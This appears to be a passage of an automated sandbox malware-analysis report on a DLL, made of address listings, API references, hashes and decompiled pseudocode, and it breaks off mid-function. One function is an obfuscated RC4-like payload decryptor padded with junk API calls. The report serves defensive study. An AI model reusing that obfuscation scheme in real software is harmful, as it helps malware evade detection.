                                                                                                            0x1001dd88
                                                                                                            0x1001dd8d
                                                                                                            0x1001dd90
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dd92
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dd99
                                                                                                            0x1001dd9c
                                                                                                            0x1001dd9e
                                                                                                            0x1001dda4
                                                                                                            0x1001ddae
                                                                                                            0x1001ddb5
                                                                                                            0x1001ddb7
                                                                                                            0x1001ddc3
                                                                                                            0x1001ddc7
                                                                                                            0x1001ddcc
                                                                                                            0x1001ddd0
                                                                                                            0x1001ddd4
                                                                                                            0x1001ddd6
                                                                                                            0x1001ddd9
                                                                                                            0x1001ddde
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dc71
                                                                                                            0x1001dc71
                                                                                                            0x1001dde1
                                                                                                            0x1001dde1
                                                                                                            0x1001dde4
                                                                                                            0x1001dde4
                                                                                                            0x1001dde8
                                                                                                            0x00000000
                                                                                                            0x1001dde8
                                                                                                            0x1001dc78
                                                                                                            0x1001dc7c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dc82
                                                                                                            0x00000000
                                                                                                            0x1001dc97
                                                                                                            0x1001dc9a
                                                                                                            0x1001dc9c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dcbf
                                                                                                            0x1001dcc3
                                                                                                            0x1001dcc8
                                                                                                            0x1001dccb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dcd2
                                                                                                            0x1001dcd6
                                                                                                            0x1001dcdb
                                                                                                            0x1001dcde
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dce5
                                                                                                            0x1001dce8
                                                                                                            0x1001dcea
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dcee
                                                                                                            0x1001dcf1
                                                                                                            0x1001dcf3
                                                                                                            0x1001dcf5
                                                                                                            0x1001dcf6
                                                                                                            0x1001dcf9
                                                                                                            0x1001dcff
                                                                                                            0x1001dd03
                                                                                                            0x1001dd05
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dd0b
                                                                                                            0x1001dd0d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dd60
                                                                                                            0x1001dd63
                                                                                                            0x1001dd67
                                                                                                            0x1001dd69
                                                                                                            0x1001dd6b
                                                                                                            0x1001dd6b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dd70
                                                                                                            0x1001dd74
                                                                                                            0x1001dd77
                                                                                                            0x1001dd7a
                                                                                                            0x1001dd7c
                                                                                                            0x1001dd7d
                                                                                                            0x1001dd7e
                                                                                                            0x1001dd7f
                                                                                                            0x1001dd80
                                                                                                            0x1001dd83
                                                                                                            0x1001dd85
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dd18
                                                                                                            0x1001dd18
                                                                                                            0x1001dd1b
                                                                                                            0x1001dd1d
                                                                                                            0x1001dd1f
                                                                                                            0x1001dd20
                                                                                                            0x1001dd23
                                                                                                            0x1001dd26
                                                                                                            0x1001dd2b
                                                                                                            0x1001dd2e
                                                                                                            0x1001dd32
                                                                                                            0x1001dd38
                                                                                                            0x1001dd3c
                                                                                                            0x1001dd3e
                                                                                                            0x1001dd44
                                                                                                            0x1001dd44
                                                                                                            0x1001dd47
                                                                                                            0x1001dd4a
                                                                                                            0x1001dd4d
                                                                                                            0x1001dd52
                                                                                                            0x1001dd56
                                                                                                            0x00000000
                                                                                                            0x1001dd56
                                                                                                            0x1001dd40
                                                                                                            0x1001dd42
                                                                                                            0x1001dd13
                                                                                                            0x1001dd13
                                                                                                            0x00000000
                                                                                                            0x1001dd13
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dc89
                                                                                                            0x1001dc8c
                                                                                                            0x1001dc90
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dca4
                                                                                                            0x1001dca7
                                                                                                            0x1001dcaa
                                                                                                            0x1001dcad
                                                                                                            0x1001dcad
                                                                                                            0x1001dcb0
                                                                                                            0x1001dcb0
                                                                                                            0x1001dcb2
                                                                                                            0x1001dcb7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dc82
                                                                                                            0x1001ddea
                                                                                                            0x1001ddea
                                                                                                            0x1001ddee
                                                                                                            0x1001ddf1
                                                                                                            0x1001ddfa
                                                                                                            0x1001ddfa
                                                                                                            0x1001de03
                                                                                                            0x00000000
                                                                                                            0x1001de03

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 4128688680-0
                                                                                                            • Opcode ID: 61c2a484d30def1def3ecb87556bc7cbebaab813836ef0d38b14f81032296a9f
                                                                                                            • Instruction ID: d0b60735e7dfbc48b8ffc6b3fb26c55a134f5783589098a9cdb935b98e8b1adc
                                                                                                            • Opcode Fuzzy Hash: 61c2a484d30def1def3ecb87556bc7cbebaab813836ef0d38b14f81032296a9f
                                                                                                            • Instruction Fuzzy Hash: 77F1797090024ADFDF11EFA8D880AAEBBB5FF09340F11806AE851AB261D774DE95CF51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100083A5 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 97%
                                                                                                            			E100083A5() {
				void* __ebx;
				void* __esi;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				void* _t20;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x100482fc; // 0x0
				if(_t23 == 0) {
					_push(_t20);
					 *0x10048300 = E1000834D(0, _t20, __eflags);
					_t18 = GetModuleHandleA("USER32");
					__eflags = _t18;
					if(_t18 == 0) {
						L12:
						 *0x100482e0 = 0;
						 *0x100482e4 = 0;
						 *0x100482e8 = 0;
						 *0x100482ec = 0;
						 *0x100482f0 = 0;
						 *0x100482f4 = 0;
						 *0x100482f8 = 0;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						__eflags = _t6;
						 *0x100482e0 = _t6;
						if(_t6 == 0) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							__eflags = _t7;
							 *0x100482e4 = _t7;
							if(_t7 == 0) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								__eflags = _t8;
								 *0x100482e8 = _t8;
								if(_t8 == 0) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									__eflags = _t9;
									 *0x100482ec = _t9;
									if(_t9 == 0) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										__eflags = _t10;
										 *0x100482f4 = _t10;
										if(_t10 == 0) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											__eflags = _t11;
											 *0x100482f0 = _t11;
											if(_t11 == 0) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												__eflags = _t12;
												 *0x100482f8 = _t12;
												if(_t12 == 0) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x100482fc = 1;
					return _t5;
				} else {
					_t24 =  *0x100482f0; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

















                                                                                                            0x100083a8
                                                                                                            0x100083ae
                                                                                                            0x100083bd
                                                                                                            0x100083c9
                                                                                                            0x100083d4
                                                                                                            0x100083d6
                                                                                                            0x100083d8
                                                                                                            0x1000846c
                                                                                                            0x1000846c
                                                                                                            0x10008472
                                                                                                            0x10008478
                                                                                                            0x1000847e
                                                                                                            0x10008484
                                                                                                            0x1000848a
                                                                                                            0x10008490
                                                                                                            0x10008496
                                                                                                            0x100083de
                                                                                                            0x100083ea
                                                                                                            0x100083ec
                                                                                                            0x100083ee
                                                                                                            0x100083f3
                                                                                                            0x00000000
                                                                                                            0x100083f5
                                                                                                            0x100083fb
                                                                                                            0x100083fd
                                                                                                            0x100083ff
                                                                                                            0x10008404
                                                                                                            0x00000000
                                                                                                            0x10008406
                                                                                                            0x1000840c
                                                                                                            0x1000840e
                                                                                                            0x10008410
                                                                                                            0x10008415
                                                                                                            0x00000000
                                                                                                            0x10008417
                                                                                                            0x1000841d
                                                                                                            0x1000841f
                                                                                                            0x10008421
                                                                                                            0x10008426
                                                                                                            0x00000000
                                                                                                            0x10008428
                                                                                                            0x1000842e
                                                                                                            0x10008430
                                                                                                            0x10008432
                                                                                                            0x10008437
                                                                                                            0x00000000
                                                                                                            0x10008439
                                                                                                            0x1000843f
                                                                                                            0x10008441
                                                                                                            0x10008443
                                                                                                            0x10008448
                                                                                                            0x00000000
                                                                                                            0x1000844a
                                                                                                            0x10008450
                                                                                                            0x10008452
                                                                                                            0x10008454
                                                                                                            0x10008459
                                                                                                            0x00000000
                                                                                                            0x1000845b
                                                                                                            0x1000845d
                                                                                                            0x1000845d
                                                                                                            0x1000845d
                                                                                                            0x10008459
                                                                                                            0x10008448
                                                                                                            0x10008437
                                                                                                            0x10008426
                                                                                                            0x10008415
                                                                                                            0x10008404
                                                                                                            0x100083f3
                                                                                                            0x10008460
                                                                                                            0x1000846b
                                                                                                            0x100083b0
                                                                                                            0x100083b2
                                                                                                            0x100083bc
                                                                                                            0x100083bc

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,74785D80,100084F1,?,?,?,?,?,?,?,1000A3B2,00000000,00000002,00000028), ref: 100083CE
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 100083EA
                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 100083FB
                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 1000840C
                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 1000841D
                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 1000842E
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 1000843F
                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 10008450
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                            • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                            • API String ID: 667068680-68207542
                                                                                                            • Opcode ID: e8b2e64e54b17024b951b3e1fbf6a3b50251443a1579d1f10a064b5ef0c7bf66
                                                                                                            • Instruction ID: 374b253654f9bab27aaa6d0bbf775ac5182f219bddcb8a0b2eb046c4e2c1642a
                                                                                                            • Opcode Fuzzy Hash: e8b2e64e54b17024b951b3e1fbf6a3b50251443a1579d1f10a064b5ef0c7bf66
                                                                                                            • Instruction Fuzzy Hash: B5214F70901D229FE352EF294FC086EBAF4F34B281751493ED248D6221D7744241EB5D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10001B36 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 205COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 89%
                                                                                                            			E10001B36(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int* _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v25;
				signed int _t85;
				signed int _t94;
				signed int _t128;
				intOrPtr _t149;
				short* _t151;
				short* _t182;

				_t84 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				if(_a24 > 0) {
					_v24 = _a4 - _a12 + _a8;
					_t151 = L"xadqsavcbdfewescGADW";
					_t182 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
					while(1) {
						_t85 = GetCurrencyFormatW(_t84, 0x11d4, _t182, _t84, _t151, 0x22b9);
						asm("cdq");
						_v20 = (_t85 * _v24 *  *0x100440dc + _v20 + 1) % 0x4708;
						_v20 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440e0 + _v20;
						_t94 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9);
						asm("cdq");
						_v16 = (( *(_t94 * _v24 *  *0x100440d0 + _v20 + _a16) & 0x000000ff) + _v16) % 0x4708;
						_v16 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440e0 + _v16;
						_v25 =  *((intOrPtr*)(GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440d0 + _v20 + _a16));
						_v8 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440e0 + _v16 + _a16;
						 *((char*)(GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440e0 + _v20 + _a16)) =  *_v8;
						 *((char*)(GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440dc + _v16 + _a16)) = _v25;
						_v8 =  *(GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440cc + _v16 + _a16) & 0x000000ff;
						_t128 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9);
						asm("cdq");
						_v8 = (( *(_t128 * _v24 *  *0x100440cc + _v20 + _a16) & 0x000000ff) + _v8) % 0x4708;
						_v8 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440d8 + _v8;
						_v4 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440dc + _v12 + _a20;
						 *_v4 =  *_v4 ^  *(GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440e0 + _v8 + _a16);
						_v12 = _v12 + 1;
						_t149 = _v12;
						if(_t149 >= _a24) {
							break;
						}
						_t84 = 0;
					}
					return _t149;
				}
				return 0;
			}
















                                                                                                            0x10001b39
                                                                                                            0x10001b3f
                                                                                                            0x10001b43
                                                                                                            0x10001b47
                                                                                                            0x10001b4b
                                                                                                            0x10001b69
                                                                                                            0x10001b6d
                                                                                                            0x10001b72
                                                                                                            0x10001b80
                                                                                                            0x10001b8a
                                                                                                            0x10001ba0
                                                                                                            0x10001bb4
                                                                                                            0x10001bd6
                                                                                                            0x10001bda
                                                                                                            0x10001bfd
                                                                                                            0x10001c0c
                                                                                                            0x10001c2e
                                                                                                            0x10001c57
                                                                                                            0x10001c77
                                                                                                            0x10001ca9
                                                                                                            0x10001cd2
                                                                                                            0x10001cfb
                                                                                                            0x10001cff
                                                                                                            0x10001d22
                                                                                                            0x10001d31
                                                                                                            0x10001d53
                                                                                                            0x10001d73
                                                                                                            0x10001d9a
                                                                                                            0x10001d9c
                                                                                                            0x10001da0
                                                                                                            0x10001da8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10001b7e
                                                                                                            0x10001b7e
                                                                                                            0x00000000
                                                                                                            0x10001db1
                                                                                                            0x10001db5

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001B8A
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001BB8
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001BDA
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001C10
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001C32
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001C5B
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001C81
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001CAC
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001CD5
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001CFF
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001D35
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001D57
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001D7D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-3161301136
                                                                                                            • Opcode ID: 69c51003af96275454d602057090bf2f3f4a2519da6507d6aeea24ce666c7f9e
                                                                                                            • Instruction ID: 0456d89d922e5c10c0a98bb53afe019d0a386320811ad7c1ac40a02f71bd5ba4
                                                                                                            • Opcode Fuzzy Hash: 69c51003af96275454d602057090bf2f3f4a2519da6507d6aeea24ce666c7f9e
                                                                                                            • Instruction Fuzzy Hash: 71710875548355AFE304DF51CE82F1BBBE8EBCAB44F01580EF6809B2A1C670E9148F66
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001AEE4 Relevance: 26.0, APIs: 17, Instructions: 452windowkeyboardCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 84%
                                                                                                            			E1001AEE4(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				struct HWND__* _v52;
				signed int _t139;
				signed int _t141;
				void* _t142;
				signed int _t146;
				signed int _t149;
				intOrPtr _t150;
				signed int _t152;
				signed char _t153;
				signed int _t154;
				signed int _t155;
				int _t156;
				signed int _t161;
				signed int _t165;
				void* _t167;
				signed char _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed char _t182;
				intOrPtr _t183;
				signed int _t184;
				short _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t195;
				signed int _t198;
				signed char _t199;
				signed int _t200;
				signed int _t201;
				short _t204;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t211;
				signed int _t215;
				signed int _t216;
				struct HWND__* _t217;
				struct tagMSG* _t221;
				intOrPtr _t224;
				void* _t231;
				void* _t234;
				struct tagMSG* _t240;
				signed int _t242;
				int _t243;
				signed int _t244;
				long _t247;
				intOrPtr _t249;
				signed int _t251;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				void* _t260;
				void* _t262;

				_t232 = __ecx;
				_t260 = _t262;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t139 = E1001AD41(_a4, _a8);
				_t238 = _t139;
				if(_t139 == 0) {
					_t232 = _a4;
					_t231 = E10009228(_a4);
					if(_t231 != 0) {
						_t221 =  *((intOrPtr*)(_t231 + 0x44));
						_a8 = _t221;
						if(_t221 != 0) {
							while(1) {
								_t9 = _t231 + 0x40; // 0x40
								_t232 = _t9;
								_t258 =  *(E1000911A( &_a8));
								_t224 =  *((intOrPtr*)(_t258 + 4));
								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
									break;
								}
								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
									if(_a8 != 0) {
										continue;
									} else {
									}
								} else {
									break;
								}
								goto L10;
							}
							_t238 = _t258;
						}
					}
				}
				L10:
				_t247 = 0;
				while(1) {
					_t238 = L1001AD93(_t232, _a4, _t238, _a12);
					if(_t238 == 0) {
						break;
					}
					_t142 = E1001A83E(_t238);
					_pop(_t232);
					if(_t142 == 0) {
						L14:
						if(_t238 == 0) {
							L21:
							__eflags =  *(_t238 + 4);
							if(__eflags == 0) {
								E10004E6E(0, _t232, _t238, _t247, __eflags);
								asm("int3");
								_push(0x28);
								E1001FBF7(E10034708, 0, _t238, _t247);
								_t146 = _a4;
								__eflags = _t146;
								if(_t146 != 0) {
									_v48 =  *((intOrPtr*)(_t146 + 0x20));
								} else {
									_v48 = _v48 & _t146;
								}
								_t240 = _a8;
								_t249 = _t240->message;
								_v32 = _t249;
								_v52 = GetFocus();
								_t149 = E1000A8F0(0, _t232, _t260, _t148);
								_t229 = 0x100;
								__eflags = _t249 - 0x100;
								_v24 = _t149;
								if(_t249 < 0x100) {
									L34:
									__eflags = _t249 + 0xfffffe00 - 9;
									if(_t249 + 0xfffffe00 > 9) {
										goto L56;
									} else {
										goto L35;
									}
								} else {
									__eflags = _t249 - 0x109;
									if(_t249 <= 0x109) {
										L35:
										__eflags = _t149;
										if(_t149 == 0) {
											L56:
											_t251 = 0;
											_v28 = 0;
											_t150 = E1000A8F0(_t229, _t232, _t260,  *_t240);
											_v44 = _v44 & 0;
											_v36 = _t150;
											_t152 = _v32 - _t229;
											__eflags = _t152;
											_v40 = 2;
											if(_t152 == 0) {
												_t153 = E1001A7F1(_v36, _t240);
												_t232 =  *(_t240 + 8) & 0x0000ffff;
												__eflags = _t232 - 0x1b;
												if(__eflags > 0) {
													__eflags = _t232 - 0x25;
													if(_t232 < 0x25) {
														goto L75;
													} else {
														__eflags = _t232 - 0x26;
														if(_t232 <= 0x26) {
															_v44 = 1;
															goto L110;
														} else {
															__eflags = _t232 - 0x28;
															if(_t232 <= 0x28) {
																L110:
																_t171 = E1001A7F1(_v24, _t240);
																__eflags = _t171 & 0x00000001;
																if((_t171 & 0x00000001) != 0) {
																	goto L75;
																} else {
																	__eflags = _v44;
																	_t232 = _a4;
																	_push(0);
																	if(_v44 == 0) {
																		_t172 = E1000F80A(_t229, _t232, _t240);
																	} else {
																		_t172 = E1000F7BC(_t229, _t232, _t240);
																	}
																	_t254 = _t172;
																	__eflags = _t254;
																	if(_t254 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t254 + 8);
																		if( *(_t254 + 8) != 0) {
																			_t232 = _a4;
																			E1000F366(_a4, _t254);
																		}
																		__eflags =  *(_t254 + 4);
																		if( *(_t254 + 4) == 0) {
																			_t173 =  *_t254;
																			__eflags = _t173;
																			if(_t173 == 0) {
																				_t232 = _a4;
																				_t174 = E1001A8AF(_a4, _v24, _v44);
																			} else {
																				_t174 = E1000A8F0(_t229, _t232, _t260, _t173);
																			}
																			_t242 = _t174;
																			__eflags = _t242;
																			if(_t242 == 0) {
																				goto L75;
																			} else {
																				_t229 = 0;
																				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x4c)) + 0x70)) = 0;
																				E1001A8E9(_t242);
																				__eflags =  *(_t254 + 8);
																				if( *(_t254 + 8) != 0) {
																					SendMessageA( *(_t242 + 0x20), 0xf1, 1, 0);
																				}
																				goto L125;
																			}
																		} else {
																			_t232 =  *(_t254 + 4);
																			 *((intOrPtr*)( *( *(_t254 + 4)) + 0xac))(_t240);
																			goto L125;
																		}
																	}
																}
															} else {
																__eflags = _t232 - 0x2b;
																if(_t232 != 0x2b) {
																	goto L75;
																} else {
																	goto L97;
																}
															}
														}
													}
													goto L126;
												} else {
													if(__eflags == 0) {
														L103:
														_t243 = 0;
														__eflags = 0;
														goto L104;
													} else {
														__eflags = _t232 - 3;
														if(_t232 == 3) {
															goto L103;
														} else {
															__eflags = _t232 - 9;
															if(_t232 == 9) {
																__eflags = _t153 & 0x00000002;
																if((_t153 & 0x00000002) != 0) {
																	goto L75;
																} else {
																	_t188 = GetKeyState(0x10);
																	_t255 = _a4;
																	__eflags = _t188;
																	_t229 = 0 | _t188 < 0x00000000;
																	_t232 = _t255;
																	_t189 = E1000F223(_t255, 0, _t188 < 0);
																	__eflags = _t189;
																	if(_t189 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t189 + 4);
																		if( *(_t189 + 4) == 0) {
																			_t190 =  *_t189;
																			__eflags = _t190;
																			if(_t190 == 0) {
																				_t232 = _t255;
																				_t191 = E10007A94(_t255, _v36, _t229);
																			} else {
																				_t191 = E1000A8F0(_t229, _t232, _t260, _t190);
																			}
																			_t244 = _t191;
																			__eflags = _t244;
																			if(_t244 != 0) {
																				 *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) =  *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) & 0x00000000;
																				E1001A8E9(_t244);
																				E1001AAB3(_t229, _t232, _t260, _v24, _t244);
																				_pop(_t232);
																			}
																		} else {
																			_t195 =  *(_t189 + 4);
																			_t232 = _t195;
																			 *((intOrPtr*)( *_t195 + 0xac))(_t240);
																		}
																		goto L125;
																	}
																}
																goto L126;
															} else {
																__eflags = _t232 - 0xd;
																if(_t232 == 0xd) {
																	L97:
																	__eflags = _t153 & 0x00000004;
																	if((_t153 & 0x00000004) != 0) {
																		goto L75;
																	} else {
																		_t182 = E1001A88E(_v24);
																		__eflags = _t182 & 0x00000010;
																		_pop(_t232);
																		if((_t182 & 0x00000010) == 0) {
																			_t183 = E1001AC34(_a4);
																		} else {
																			_t251 = _v24;
